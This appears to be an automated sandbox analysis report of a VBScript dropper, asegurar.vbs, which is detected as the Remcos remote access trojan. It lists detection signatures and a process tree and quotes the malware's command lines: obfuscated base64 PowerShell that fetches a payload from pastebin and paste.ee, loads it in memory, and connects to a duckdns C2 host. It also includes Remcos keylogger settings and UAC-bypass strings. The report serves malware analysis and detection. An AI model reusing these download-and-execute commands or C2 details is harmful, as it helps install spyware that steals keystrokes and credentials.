
Windows Analysis Report
asegurar.vbs

Overview

General Information

Sample name: asegurar.vbs
Analysis ID: 1545852
MD5: aee210142f6411df0f3c0469d2a9df27
SHA1: 991b0e994e4da9f76bf9fd03bc3fef75dfd94590
SHA256: 3a07acb9e24dace059cea1a5c9c90f457e3c0d3e823805ae2fd0241d75917fc2
Tags: vbs, user-lontze7

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5480 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?H
E?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3428 cmdline: "C:\Windows\system32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • PING.EXE (PID: 2476 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 5480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 7372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["sost.duckdns.org:2001:0"], "Assigned name": "NewssTar", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T0UVJ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Dropped files

Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Memory dumps

Source | Rule | Description | Author
00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Unpacked PEs

Source | Rule | Description | Author
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Matched strings:
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
8.2.AddInProcess32.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  Matched strings:
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]

                    System Summary

-UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 
'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 
'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 980, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 5480, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", 
